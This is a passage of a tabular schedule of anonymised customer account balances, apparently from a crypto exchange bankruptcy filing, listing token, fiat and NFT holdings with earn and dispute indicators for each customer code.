| 07316640 | | AAVE[0], BRZ[0], BTC[0], DOGE[5], ETH[0], GRT[1], KSHIB[0.60523592], LINK[0], LTC[0], MATIC[0.04217031], SHIB[461.45839112], SOL[0], SUSHI[0], TRX[3], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07316641 | | SOL[0.18827744], USD[0.00] | | |
| 07316642 | | USD[10.00] | | |
| 07316643 | | DOGE[.223], USD[0.96] | | |
| 07316646 | | BRZ[6.6398088], CUSDT[8], DOGE[4118.85569155], LINK[.00017905], TRX[6], USD[0.00], USDT[2.21458601] | Yes | |
| 07316647 | | USD[10.00] | | |
| 07316648 | | BRZ[2], SOL[.00000325], TRX[2], USD[0.00] | Yes | |
| 07316649 | | BRZ[1], CUSDT[3], DOGE[60.47665538], TRX[3], USD[0.00] | | |
| 07316650 | | DOGE[.0000327], USD[12.69] | | |
| 07316651 | | BRZ[1], BTC[0.01290982], CUSDT[16], DOGE[7.24701130], ETH[0], GRT[0], SHIB[250918.50517519], SOL[2.85615547], SUSHI[0], TRX[6], USD[0.00], USDT[0] | Yes | |
| 07316652 | | DOGE[1685.736], USD[0.31] | | |
| 07316653 | | USD[10.00] | | |
| 07316654 | | CAD[0.00], CUSDT[1], GRT[27.63148479], SHIB[91310963.21051039], TRX[2], USD[0.00] | Yes | |
| 07316655 | | USD[10.00] | | |
| 07316657 | | BAT[2.01005688], BRZ[1.00042087], BTC[0.00000133], CUSDT[13], ETH[.00000017], ETHW[.01825019], GRT[24.46935272], NFT (326750065698810616/Momentum #623)[1], NFT (381647878012139265/SALT New York 2022 #30)[1], SHIB[1], SOL[0.00916708], TRX[25.49013333], USD[2391.99], USDT[0.00000001] | Yes | |
| 07316658 | | USD[10.00] | | |
| 07316659 | | ETH[0], SOL[0], USD[0.64], USDT[0] | Yes | |
| 07316661 | | USD[10.00] | | |
| 07316662 | | SUSHI[.66455452], USD[0.00] | | |
| 07316663 | | CUSDT[3], DOGE[2], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07316664 | | DOGE[1], USD[0.01] | | |
| 07316666 | | BF_POINT[600], BRZ[2], BTC[0], CUSDT[23], DOGE[0], ETHW[10.8236786], LINK[1.07004961], NFT (543985130895314887/Imola Ticket Stub #2022)[1], SHIB[5966434.31692346], SOL[0], SUSHI[1.05476054], TRX[6], UNI[2.13381556], USD[193.73] | Yes | |
| 07316667 | | BAT[2], BRZ[4], CUSDT[5], DOGE[11.00045399], TRX[1], USD[0.00], USDT[0.00008398] | | |
| 07316668 | | CUSDT[1], USD[0.00] | Yes | |
| 07316670 | | DOGE[1], ETH[.00035545], ETHW[.00035545], USD[0.00], USDT[0.00000018] | | |
| 07316671 | | USD[10.00] | | |
| 07316673 | | USD[0.01] | | |
| 07316675 | | USD[10.00] | | |
| 07316676 | | BTC[0], DOGE[5642.74470887], ETH[0.00000001], ETHW[0.0000942], LINK[3.12246957], SOL[0], SUSHI[0], USD[30390.54], USDT[16.83878807] | Yes | |
| 07316677 | | BRZ[0], BTC[0], DOGE[.13303319], ETH[0.00001844], ETHW[0.00001844], UNI[.00993232], USD[0.00], USDT[0] | Yes | |
| 07316679 | | BTC[.00015346], USD[0.74] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07316680 | | SOL[0], SUSHI[0], USD[0.00] | | |
| 07316681 | | USD[10.00] | | |
| 07316682 | | DOGE[.756], USD[0.00] | | |
| 07316683 | | USD[10.00] | | |
| 07316684 | | BRZ[1], BTC[0], CUSDT[8], DOGE[7.29372913], LTC[0], SOL[0], TRX[5], USD[0.16] | Yes | |
| 07316685 | | USD[10.00] | | |
| 07316686 | | BRZ[1], CUSDT[3], DOGE[39.12899589], LINK[.00000727], TRX[2], USD[0.00] | | |
| 07316689 | | BRZ[1], CUSDT[2], DOGE[2], GRT[1824.94764123], TRX[1], UNI[15.43973823], USD[0.00], USDT[1.0764525] | Yes | |
| 07316690 | | BAT[2], BRZ[6], BTC[0], CUSDT[28], DOGE[0], ETH[0], GRT[1], LINK[0], LTC[0], SUSHI[0], TRX[13], UNI[0], USD[0.00], USDT[2] | | |
| 07316691 | | BAT[1], CUSDT[1], DOGE[2], SOL[1.25785792], USD[0.00] | | |
| 07316692 | | DAI[0], USD[0.00] | Yes | |
| 07316693 | | USD[10.00] | | |
| 07316694 | | BRZ[3], CUSDT[3], DOGE[3538.68117601], GRT[1], TRX[2], USD[0.00] | | |
| 07316695 | | USD[10.00] | | |
| 07316696 | | DOGE[0], ETH[0.11817818], ETHW[0.11817818], TRX[1], USD[10.00] | | |
| 07316697 | | BTC[0.02293383], DOGE[382.25836936], ETH[.16805], ETHW[.16805], MATIC[10], MKR[.000988], SOL[8.4453232], SUSHI[1], USD[31261.62], YFI[.001] | | |
| 07316699 | | USD[10.00] | | |
| 07316700 | | USD[10.00] | | |
| 07316701 | | DOGE[.76], USD[0.05] | | |
| 07316703 | | BCH[0], BTC[0], DOGE[.0911964], USD[0.00] | | |
| 07316705 | | KSHIB[2.93692396], SUSHI[6.46043111], USD[0.00] | | |
| 07316706 | | USD[10.00] | | |
| 07316707 | | BAT[0], DOGE[499.65049426], ETH[0], SOL[0], SUSHI[0], USD[0.23] | | |
| 07316708 | | USD[10.00] | | |
| 07316712 | | CUSDT[2], DOGE[139.68940404], USD[0.01] | | |
| 07316713 | | CUSDT[2], DOGE[.00197533], GRT[1.00367791], TRX[1], USD[0.41] | Yes | |
| 07316714 | | BRZ[2], CUSDT[4], DOGE[4], TRX[1], USD[0.00], USDT[0] | | |
| 07316715 | | BTC[.00070304], DOGE[6.21261137], ETH[.00380299], ETHW[.00376195], SOL[.0302316], USD[50.94] | Yes | |
| 07316716 | | USD[10.00] | | |
| 07316717 | | BAT[2.13247621], BRZ[4], BTC[0], CUSDT[3], DOGE[2], ETH[0], GRT[1.00498957], SHIB[3], TRX[6], USD[0.00], USDT[0] | | |
| 07316719 | | BTC[0], DOGE[4.48727360], ETH[0], USD[0.00], USDT[0.00000001] | | |
| 07316720 | | BAT[1], BRZ[2], USD[0.01] | | |
| 07316722 | | BTC[.003267], DOGE[8.50569872], ETH[.00001872], ETHW[.00001872], NEAR[5.17651745], SHIB[1309598.66117824], SOL[.00000687], USD[0.00] | Yes | |
| 07316724 | | BTC[0], ETHW[0], USD[0.00], USDT[.06711609] | | |
| 07316725 | | USD[10.00] | | |
| 07316726 | | ETH[.00000731], ETHW[.00000731], GRT[.10515908], SOL[0], USD[0.01], USDT[0] | Yes | |
| 07316727 | | BRZ[2], CUSDT[1], TRX[2], USD[0.00] | | |
| 07316728 | | USD[10.00] | | |
| 07316730 | | AAVE[0], AUD[0.00], BAT[4.66198446], BCH[0.25863537], BTC[0.01302373], CUSDT[35], DOGE[21227.22995231], ETH[.03664225], ETHW[.0361908|1], GRT[0], KSHIB[16890.14757977], LINK[10.79953425], LTC[10.23314584], MKR[0.01814291], NFT (376098846171200902/Chitto #3)[1], NFT (377776099277293267/Vegas Raiders strong )[1], NFT (433465155601608121/Cabo #5 of 5)[1], NFT (453146308909628955/Fancy Frenchies #5846)[1], NFT (532758903104295043/Sleeping Lover)[1], PAXG[0], SHIB[9345187.83010746], SOL[0.00026825], SUSHI[0.00000109], TRX[3237.86882502], USD[0.11], USDT[0.00000008], YFI[0.01795523] | Yes | |
| 07316731 | | CUSDT[2], DOGE[1], GRT[2.08240072], SOL[.17267261], TRX[7], USD[0.00] | Yes | |
| 07316733 | | ETHW[0.00393525], SOL[.008525], USD[0.56] | | |
| 07316734 | | USD[10.00] | | |
| 07316738 | | CUSDT[2], USD[0.00] | | |
| 07316739 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07316740 | | USD[10.00] | | |
| 07316741 | | BTC[.00853787], GRT[120.84828258], SOL[1.08665102], SUSHI[66.73042094], UNI[2.49847638], USD[0.17] | Yes | |
| 07316742 | | AAVE[.2968448], BRZ[1], CUSDT[3], DOGE[304.68632351], ETH[.02199562], ETHW[.04148244], GRT[11.04562389], LINK[1.11141845], SHIB[6], SOL[8.45856571], SUSHI[1.14989973], TRX[3], UNI[3.92005507], USD[0.00] | Yes | |
| 07316743 | | DOGE[0], LTC[0], SOL[0], TRX[0], UNI[0], USD[0.00] | | |
| 07316745 | | BRZ[3], CUSDT[52.8800418], ETHW[.29481405], GRT[1], NFT (468014525440382115/Entrance Voucher #2644)[1], NFT (490647803668667350/Coachella x FTX Weekend 2 #18636)[1], SHIB[22], TRX[17.00242938], USD[0.01] | Yes | |
| 07316746 | | USD[10.00] | | |
| 07316747 | | BTC[.00022487], USD[0.00], USDT[0.00030417] | Yes | |
| 07316748 | | AAVE[0], BRZ[0], BTC[0], ETH[0], ETHW[0], LINK[0], LTC[0], MATIC[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07316750 | | CUSDT[11], DOGE[38.61387218], TRX[3], USD[157.75] | | |
| 07316751 | | DOGE[0], ETH[0], ETHW[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07316753 | | DOGE[.721], EUR[3.54], USD[0.52], USDT[.0052218] | | |
| 07316754 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07316755 | | BTC[0], DAI[0], ETH[0], MATIC[0], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07316756 | | BTC[0], DOGE[0.17125805], ETH[0], SOL[0], USD[4.91], USDT[0] | | |
| 07316757 | | USD[10.00] | | |
| 07316758 | | BF_POINT[200], BTC[.00002056], CUSDT[1], SOL[.00046264], TRX[2], UNI[1.02314951], USD[0.01] | Yes | |
| 07316759 | | BAT[2], BRZ[1], BTC[0], CUSDT[2], DOGE[7], GRT[1], TRX[6], USD[0.00] | | |
| 07316761 | | USD[10.00] | | |
| 07316762 | | USD[10.00] | | |
| 07316763 | | USD[10.90] | Yes | |
| 07316764 | | BAT[1], BRZ[2], BTC[0], CUSDT[8], DOGE[6], LTC[0], SOL[0], USD[0.00], USDT[2] | | |
| 07316765 | | BRZ[1], BTC[0], CUSDT[7], DOGE[0], LTC[.00000083], TRX[1], USD[0.00], USDT[2] | | |
| 07316768 | | CUSDT[2], SHIB[2], USD[0.04] | Yes | |
| 07316769 | | USD[10.00] | | |
| 07316771 | | DOGE[1], LTC[.03553305], USD[0.00] | | |
| 07316772 | | USD[10.00] | | |
| 07316775 | | AVAX[0], BAT[2.12432012], BRZ[3], CUSDT[7], DOGE[6.1310731], ETHW[1.00954157], GRT[0], SHIB[3802214.16807929], SOL[0], TRX[1], USD[207.15] | Yes | |
| 07316776 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], EUR[0.00], GBP[0.00], LINK[0], LTC[0], SOL[0], USD[0.00] | | |
| 07316779 | | USD[10.00] | | |
| 07316780 | | DOGE[0], ETH[0], SUSHI[.16982485], USD[3.48] | | |
| 07316781 | | BAT[.928], DOGE[.204], ETH[.00896401], ETHW[0.00896400], LTC[.00756], SOL[0.08960000], TRX[.003], USD[0.87], YFI[.000996] | | |
| 07316782 | | DOGE[.615], USD[53.33] | | |
| 07316783 | | USD[10.00] | | |
| 07316784 | | BRZ[2], BTC[0], CUSDT[5], DOGE[2], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[3], UNI[0], USD[0.84], USDT[0.00000001] | Yes | |
| 07316785 | | BCH[.19465985], CUSDT[11], DOGE[351.55245333], SHIB[2225.0895979], USD[8.13] | Yes | |
| 07316787 | | CUSDT[1], DOGE[2136.26572198], USD[0.17] | Yes | |
| 07316788 | | BRZ[4], CUSDT[10], DOGE[360.00000419], TRX[7], USD[0.00] | | |
| 07316789 | | ETH[0], USD[0.01], USDT[0] | | |
| 07316791 | | USD[0.00] | | |
| 07316792 | | CUSDT[4], USD[0.01] | | |
| 07316793 | | BTC[0.00015779], DOGE[0], ETH[0], ETHW[0] | | |
| 07316794 | | BF_POINT[400], CUSDT[2], DOGE[2], SHIB[5], TRX[2], UNI[1.04877767], USD[0.00] | Yes | |
| 07316795 | | BRZ[1], DOGE[2], TRX[3], USD[0.01], USDT[0] | Yes | |
| 07316797 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07316798 | | AVAX[0], BF_POINT[200], BTC[0], ETH[0], MATIC[0], NEAR[.00000693], NFT (31665994169091933/Humpty Dumpty #269)[1], SHIB[4956.47582070], SOL[0], TRX[4.07866456], UNI[.00000001], USD[0.00], USDT[0] | Yes | |
| 07316799 | | USD[0.00] | | |
| 07316800 | | USD[0.00] | | |
| 07316801 | | UNI[.40981634], USD[0.00] | | |
| 07316802 | Contingent, Disputed | USD[0.00] | | |
| 07316803 | | DOGE[1649.349], USD[0.38] | | |
| 07316804 | | DOGE[.244], USD[0.15] | | |
| 07316805 | | USD[10.00] | | |
| 07316806 | | DOGE[.488], USD[6.99] | | |
| 07316807 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07316808 | | BRZ[2], DOGE[0], SOL[0], SUSHI[.00532668], USD[0.00] | | |
| 07316810 | | ETH[.0059163], ETHW[.0058479], USD[0.00] | Yes | |
| 07316811 | | USD[10.00] | | |
| 07316812 | | USD[10.00] | | |
| 07316813 | | CUSDT[1], SUSHI[0], TRX[1], USD[0.00] | | |
| 07316815 | | DAI[751.84649999], USD[8218.95] | | |
| 07316816 | | BAT[1.0165555], DOGE[21.71207224], ETH[.12991502], ETHW[.12884816], UNI[7.53778294], USD[0.00] | Yes | |
| 07316817 | | BAT[80.1838225], BTC[.03069286], CUSDT[7], DOGE[1], ETH[.10189239], ETHW[.10084537], LINK[5.35945824], MATIC[54.79930017], SHIB[4], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07316820 | | CUSDT[1], DOGE[790.03929728], USD[0.00] | | |
| 07316821 | | DOGE[291.15635714], USD[0.00] | | |
| 07316824 | Contingent, Disputed | DOGE[0], ETH[0], ETHW[0], SOL[0], SUSHI[0], USD[10000.00] | Yes | |
| 07316825 | | CUSDT[2], DOGE[0], ETH[0], TRX[1], USD[0.01] | | |
| 07316828 | | DOGE[.536], USD[0.00] | | |
| 07316829 | Contingent, Disputed | BTC[0], ETH[0], PAXG[0], USD[0.00], USDT[0] | Yes | |
| 07316831 | | SOL[.31760817], USD[0.00] | Yes | |
| 07316832 | | CUSDT[4], TRX[3], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07316833 | | BRZ[9], CUSDT[11], DOGE[1], TRX[17], USD[0.00] | | |
| 07316834 | | BTC[.00000137], CUSDT[1], DOGE[1], ETH[0], USD[0.00] | | |
| 07316835 | | AVAX[0], BTC[0.00247626], CUSDT[0], ETH[0], ETHW[0], PAXG[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000001] | | |
| 07316836 | | BTC[0], DOGE[0] | | |
| 07316838 | | USD[10.00] | | |
| 07316840 | | BRZ[1], CUSDT[1], DOGE[5607.41544137], TRX[2], USD[0.36] | | |
| 07316842 | | DOGE[1], NFT (425245155687566782/APEFUEL by Almond Breeze #183)[1], USD[0.00], USDT[0] | Yes | |
| 07316844 | | BF_POINT[300], BRZ[1], CUSDT[12], DOGE[1], USD[0.11], USDT[1.11040075] | Yes | |
| 07316845 | | DOGE[157.29185568], TRX[1], USD[0.72], USDT[0] | | |
| 07316847 | | USD[11.04] | Yes | |
| 07316848 | | USD[10.00] | | |
| 07316849 | | BTC[0], CUSDT[1], USD[10.00] | | |
| 07316850 | | USD[0.01] | | |
| 07316851 | | USD[1.57] | | |
| 07316852 | | USD[10.00] | | |
| 07316853 | | CUSDT[1], DOGE[681.00616417], TRX[1], USD[0.00] | | |
| 07316854 | | USD[0.00] | | |
| 07316855 | | BTC[0], ETH[0], ETHW[0], SHIB[18], SUSHI[.00000562], USD[0.00], USDT[0.00002727] | Yes | |
| 07316856 | | USD[10.00] | | |
| 07316858 | | BCH[0], DOGE[0], LINK[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07316859 | | BAT[1], BRZ[2], CUSDT[1], GRT[1], LINK[1.06529407], SHIB[.00000043], SUSHI[1.06436054], TRX[7], USD[0.00], USDT[2.13058811] | Yes | |
| 07316860 | | BTC[0.00005163], ETH[.09827864], ETHW[0.09827863], LINK[.07896814], USD[168.07] | | |
| 07316862 | | BRZ[1], CUSDT[6], DOGE[7.16020835], ETH[1.22752966], ETHW[1.227014], SHIB[1], SOL[49.18975194], SUSHI[113.0779159], TRX[4], USD[0.00], USDT[1.0827866] | Yes | |
| 07316863 | | ETH[.00570855], ETHW[.00564015], USD[0.00] | Yes | |
| 07316864 | | CUSDT[1], ETH[.00000108], ETHW[.00000108], SOL[2.05932813], TRX[1], USD[0.00] | Yes | |
| 07316865 | | USD[0.00], USDT[0.00006878] | | |
| 07316866 | | DOGE[1.496], SOL[2.997], USD[0.12] | | |
| 07316867 | | BRZ[1], CUSDT[2], USD[10.00] | | |
| 07316868 | | USD[0.00] | | |
| 07316870 | | USD[7.92] | | |
| 07316872 | | BRZ[1], BTC[0], CUSDT[2], DOGE[0], ETH[0], GRT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07316873 | | BF_POINT[200], BRZ[2], CUSDT[8], USD[0.00] | | |
| 07316874 | | AAVE[0], BRZ[0], SHIB[.89980916], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07316875 | | USD[10.00] | | |
| 07316876 | | USD[0.00] | Yes | |
| 07316877 | | BCH[.02193761], BTC[.00041741], CUSDT[4], DOGE[1], ETH[.00324817], ETHW[.0032071], GRT[15.33014488], LINK[2.77289072], MATIC[9.82378359], SOL[1.88049612], USD[0.00], YFI[.00032616] | Yes | |
| 07316878 | | USD[10.00] | | |
| 07316880 | | AVAX[0], BF_POINT[200], BTC[0], CAD[0.00], DOGE[0], ETH[0], LINK[0.00000001], LTC[0], MATIC[0], NFT (319568686612945164/FTX - Off The Grid Miami #4781)[1], NFT (539136092713272241/Cloud Storm #185)[1], SHIB[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07316881 | | USD[10.00] | | |
| 07316882 | Contingent, Disputed | BTC[.00000039], DOGE[0.00644648], MATIC[.00094503], SHIB[24.44290776], SOL[0.00002774], USD[0.00] | Yes | |
| 07316883 | | BAT[3.25559396], BRZ[8.70384362], CUSDT[41], GRT[.0015038], NFT (407933614868109878/Saudi Arabia Ticket Stub #446)[1], SHIB[4], USD[50.64], USDT[1.09059425] | Yes | |
| 07316886 | | BRZ[5], CUSDT[1], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07316887 | | TRX[1.17936747], USD[0.00], USDT[0] | | |
| 07316888 | | USD[0.00] | | |
| 07316891 | | DOGE[.464], ETH[0], USD[1.12] | | |
| 07316894 | | BTC[0.00002300], DOGE[.164], USD[0.76], USDT[0] | | |
| 07316895 | | CUSDT[2], DOGE[3], SOL[0], SUSHI[.67359572], TRX[1], USD[0.01] | | |
| 07316896 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[3], SOL[1], TRX[3], USD[10.00], USDT[2] | | |
| 07316897 | | USD[19.80] | | |
| 07316898 | | USD[10.00] | | |
| 07316899 | | BRZ[1], ETHW[0], SHIB[1], SOL[.00000001], TRX[2], USD[-0.24], USDT[0.00000001] | Yes | |
| 07316901 | | AAVE[0], BRZ[1], BTC[0], ETH[0.00000001], SHIB[1], SOL[0], SUSHI[0.00000872], USD[0.02], USDT[0] | Yes | |
| 07316902 | | USD[10.00] | | |
| 07316903 | | BTC[0], TRX[12.23532185], USD[0.00], USDT[0] | | |
| 07316905 | | DOGE[6.97200000], SUSHI[0], TRX[0], USD[0.29], USDT[0] | | |
| 07316906 | | USD[10.00] | | |
| 07316907 | | BRZ[1], CUSDT[1], DOGE[1], USD[42.98] | | |
| 07316908 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07316909 | | BRZ[1], SHIB[1], USD[129.72] | Yes | |
| 07316911 | | CUSDT[1303.64262986], ETH[.00612907], ETHW[.00604699], SHIB[788909.25268299], SOL[3.14749493], TRX[350.48119501], USD[111.17], USDT[27.60421963] | Yes | |
| 07316912 | | USD[10.00] | | |
| 07316913 | | USD[10.00] | | |
| 07316914 | | CUSDT[1], DOGE[6717.71232337], USD[10.00] | | |
| 07316915 | | BTC[0], SHIB[1], USD[0.50], USDT[0.00004728] | | |
| 07316917 | | CUSDT[2], DOGE[9], TRX[6], USD[0.00] | | |
| 07316918 | | USD[10.00] | | |
| 07316919 | | USD[10.00] | | |
| 07316920 | | DOGE[2.09830423], TRX[2], USD[0.01] | Yes | |
| 07316922 | | USD[0.02] | | |
| 07316923 | | DOGE[5], SOL[0], USD[0.00], USDT[0] | | |
| 07316925 | | DOGE[0], ETH[0], SOL[0], USD[0.00], USDT[8.97206958] | | |
| 07316926 | | USD[10.00] | | |
| 07316927 | | BRZ[0.00000032], BTC[0], CUSDT[1], DAI[0], DOGE[1], ETH[0], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07316928 | | USD[10.00] | | |
| 07316930 | Contingent, Disputed | GRT[1], TRX[1], USD[10412.81] | | |
| 07316931 | | USD[10.00] | | |
| 07316933 | | AUD[0.00], BRZ[1], CUSDT[4], DOGE[963.02959039], EUR[0.00], LINK[0], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07316935 | | DOGE[8.00055846], TRX[2], USD[0.25] | | |
| 07316936 | | USD[10.00] | | |
| 07316937 | | BF_POINT[400], BTC[0], ETHW[.00001693], LINK[0], MATIC[0], SHIB[8], SOL[0], SUSHI[0.00700722], USD[50.74], USDT[0] | Yes | |
| 07316938 | | DOGE[2], USD[0.00] | | |
| 07316939 | | SOL[1.41033356], USD[0.00] | Yes | |
| 07316941 | | SOL[1.09920531], USD[0.00] | | |
| 07316943 | | BRZ[1], CUSDT[2], DOGE[1], TRX[3], USD[0.00] | | |
| 07316944 | | DOGE[3.09199198], USD[0.00], USDT[0] | Yes | |
| 07316945 | | SUSHI[.68076838], USD[0.00] | | |
| 07316946 | | USD[10.00] | | |
| 07316947 | | BTC[.00020775], CUSDT[2], DOGE[4524.67451523], ETH[.06843098], ETHW[.06758282], USD[0.00] | Yes | |
| 07316948 | | USD[0.00], USDT[0.00000001] | | |
| 07316949 | | USD[10.00] | | |
| 07316950 | | BF_POINT[100], BRZ[1], BTC[0.02266087], CUSDT[30], DOGE[49.24655714], ETH[1.41204834], ETHW[1.53244224], GRT[282.34571588], LINK[140.56241409], MATIC[43.05584551], MKR[.15869806], NFT (302525675648306726/Ronin Duckie #02)[1], NFT (362700904842660656/Imola Ticket Stub #328)[1], NFT (375263306737588530/FractumPunk #23)[1], NFT (390487250039630122/FractumPunk #46)[1], NFT (420779201797465267/Ronin Duckie #06)[1], NFT (436657993392419500/FTX Crypto Cup 2022 Key #2977)[1], NFT (447205209089651121/FractumPunk #16)[1], NFT (562636699417411220/Founding Frens Investor #388)[1], NFT (564351770837373445/FTX - Off The Grid Miami #6986)[1], SHIB[1], SOL[51.02936049], SUSHI[1.17104898], TRX[122.15312697], USD[0.00], USDT[0.00000006] | Yes | |
| 07316951 | | BAT[.549], DOGE[9.02948067], ETH[.242888], ETHW[.242888], USD[699.24], USDT[.01316736] | | |
| 07316952 | | USD[10.00] | | |
| 07316954 | | DOGE[1.00002683], USD[195.39] | | |
| 07316955 | | DOGE[.05713831], USD[0.00] | | |
| 07316956 | | USD[0.00] | | |
| 07316957 | | BTC[.00043615], SHIB[1], USD[0.10] | Yes | |
| 07316959 | | USD[0.00] | | |
| 07316960 | | BRZ[2], CUSDT[1], DOGE[103.82949758], TRX[2], USD[0.00] | | |
| 07316962 | | USD[10.00] | | |
| 07316963 | | USD[10.00] | | |
| 07316964 | | USD[10.00] | | |
| 07316965 | | DOGE[3115.05818620], ETH[.02326933], ETHW[.02326933], USD[0.00] | | |
| 07316966 | | USD[10.00] | | |
| 07316969 | | USD[10.00] | | |
| 07316971 | | BRZ[1], CUSDT[2], DOGE[4.0124669], ETH[.00020385], ETHW[0], GRT[1.00229484], MATIC[.02801305], SHIB[2], TRX[2], USD[0.00] | Yes | |
| 07316972 | | USD[0.00] | | |
| 07316973 | | BRZ[1], DOGE[77.55457072], GRT[1], TRX[1], USD[0.78] | | |
| 07316977 | | BRZ[0], BTC[0], DOGE[9.26809536], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07316978 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07316980 | | USD[10.00] | | |
| 07316981 | | USD[10.00] | | |
| 07316983 | | USD[10.00] | | |
| 07316985 | | DOGE[.843], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07316986 | | USD[0.00] | | |
| 07316987 | | USD[10.00] | | |
| 07316988 | | BAT[1], BRZ[3], CUSDT[1], DOGE[3291.05854607], ETH[1.65169852], ETHW[1.65169852], TRX[2], USD[0.01] | | |
| 07316990 | | USD[10.00] | | |
| 07316991 | | USD[10.00] | | |
| 07316992 | | USD[10.00] | | |
| 07316993 | | USD[10.00] | | |
| 07316995 | | CUSDT[1], DOGE[1.45372567], TRX[1], USD[0.00], USDT[2] | | |
| 07316998 | | USD[10.00] | | |
| 07316999 | | USD[0.53] | | |
| 07317000 | | BTC[.00020736], DOGE[456.92092653], USD[0.00] | | |
| 07317001 | | BTC[0.05423914], ETH[0], SUSHI[0], USD[1.75] | | |
| 07317004 | | USD[10.00] | | |
| 07317005 | | DOGE[4], TRX[1], USD[0.00] | | |
| 07317006 | | DOGE[0], USD[0.02] | | |
| 07317007 | | AAVE[7.95367885], BAT[2.03600865], BRZ[4], CUSDT[2], DOGE[88.12065393], ETHW[80.11802114], GRT[2.00609763], SUSHI[1.0458018], TRX[2], USD[1437.96], USDT[2.11380369] | Yes | |
| 07317008 | | USD[0.00], USDT[.009363] | | |
| 07317009 | | USD[10.00] | | |
| 07317010 | | DOGE[0.39385558], ETH[.361552], ETHW[.361552], LTC[.00155], USD[4.35] | | |
| 07317011 | | BRZ[1], CUSDT[1], GRT[8.95768173], USD[0.00] | | |
| 07317012 | | USD[10.00] | | |
| 07317015 | | USD[10.00] | | |
| 07317017 | | USD[10.00] | | |
| 07317018 | | USD[0.00] | | |
| 07317019 | | USD[10.00] | | |
| 07317020 | | DOGE[499.5], USD[20.91] | | |
| 07317021 | | USD[10.00] | | |
| 07317023 | | ETH[0.00270000], USD[0.00] | | |
| 07317024 | | USD[0.01] | | |
| 07317025 | | CUSDT[1], USD[0.01] | | |
| 07317026 | | BRZ[2], CUSDT[4], DOGE[26087.61992965], ETH[1.10616794], ETHW[1.10570334], TRX[6], USD[0.00], USDT[1.11000321] | Yes | |
| 07317027 | | BF_POINT[100], TRX[16971.59237661], USD[11.05] | Yes | |
| 07317028 | | BTC[0], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07317029 | | BAT[0], BTC[0], DOGE[0], ETH[0], SUSHI[0], USD[0.06] | | |
| 07317030 | | CUSDT[2], DOGE[2], LINK[.38079993], USD[0.00] | | |
| 07317031 | | USD[10.00] | | |
| 07317032 | | USD[10.00] | | |
| 07317033 | | DOGE[.51252552], GRT[2], USD[0.00] | | |
| 07317034 | | BCH[0], DOGE[1.52505498], USD[0.00] | | |
| 07317035 | | USD[10.00] | | |
| 07317038 | | BAT[1.01655549], CUSDT[7], DOGE[1], LINK[36.67907787], TRX[1], USD[0.00] | Yes | |
| 07317040 | | DOGE[109.05850288], USD[0.00], USDT[0.03910686] | | |
| 07317041 | | USD[10.00] | | |
| 07317042 | | USD[10.00] | | |
| 07317043 | | DOGE[1.73793140], USD[0.00] | | |
| 07317044 | | BTC[.000107], CUSDT[9], DOGE[5.43588154], ETH[.00085064], ETHW[.00083712], SHIB[2], USD[0.00] | Yes | |
| 07317045 | | GRT[5.44714006], USD[0.00] | | |
| 07317047 | | DOGE[0.85802930], USDT[0] | | |
| 07317051 | | BAT[1], BRZ[2], CUSDT[1], DOGE[1943.03010174], ETH[0], GRT[2], TRX[1], USD[1.97] | | |
| 07317052 | | CUSDT[2], TRX[1], USD[204.23] | | |
| 07317053 | | DOGE[138.73237179], USD[0.00] | | |
| 07317054 | | DOGE[5], SUSHI[.00348464], TRX[1], USD[0.00] | Yes | |
| 07317055 | | USD[10.00] | | |
| 07317058 | | BTC[0.00003780], DOGE[97259.01028818], ETH[.0001468], ETHW[.0001468], USD[1.41] | | |
| 07317059 | | CUSDT[1], TRX[6.25169652], USD[0.00] | | |
| 07317060 | | BTC[0.00001741], DOGE[.8], ETH[.003984], ETHW[.003984], USD[0.05] | | |
| 07317061 | | BRZ[0], CUSDT[3], DOGE[0], ETH[0.43930465], ETHW[0.43910796], GRT[1], LTC[0], TRX[25.06075746], USD[2496.07], USDT[0] | Yes | |
| 07317062 | | DOGE[1], SUSHI[8.21893339], TRX[1], USD[0.06] | Yes | |

